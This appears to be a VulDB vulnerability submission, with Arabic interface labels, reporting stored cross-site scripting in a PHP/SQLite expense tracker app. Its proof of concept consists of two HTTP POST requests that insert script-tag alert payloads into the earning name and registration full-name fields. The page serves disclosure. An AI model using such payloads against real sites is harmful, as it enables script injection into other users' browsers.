إرسال #106926: Earnings and Expense Tracker App Stored XSS Vulnerability المعلومات

عنوان	Earnings and Expense Tracker App Stored XSS Vulnerability
الوصف	Earnings and Expense Tracker App has a Stored XSS Vulnerabilities at its Add New Earning function and User register function , attackers can add a new expense with a malicous name , which will trigger XSS. Or register a user with a malicious full name. POC: 1. POST /php-sqlite-expense-tracker/Master.php?a=save_earning HTTP/1.1 ************************************************ formToken=%242y%2410%241AZNafu7LpOn%2FA8VwQr0C.XhZffUbGkf0NqrmYBGAudhxUpJLjG.q&earning_id=&name=%3Cscript%3Ealert('6')%3C%2Fscipt%3E&amount=0 2. POST /php-sqlite-expense-tracker/LoginRegistration.php?a=register_user HTTP/1.1 *************************************************************************************** formToken=%242y%2410%24fW6Nlw1zftgpktKK3HKGUORJ1PJT2LE4qZhgK3wbs1sExpZhkUFka&fullname=%3Cscript%3Ealert('fooooo')%3C%2Fscript%3E&username=fooooo&password=fooooo
المصدر	⚠️ https://www.sourcecodester.com/php/16354/earnings-and-expense-tracker-app-using-php-and-sqlite3-source-code-free-download.html
المستخدم	WWesleywww (UID 43117)
ارسال	28/03/2023 02:19 PM (3 سنوات منذ)
الاعتدال	28/03/2023 11:07 PM (9 hours later)
الحالة	تمت الموافقة
إدخال VulDB	224309 [SourceCodester Earnings and Expense Tracker App 1.0 LoginRegistration.php?a=register_user fullname البرمجة عبر المواقع]
النقاط	20

Do you need the next level of professionalism?

Upgrade your account now!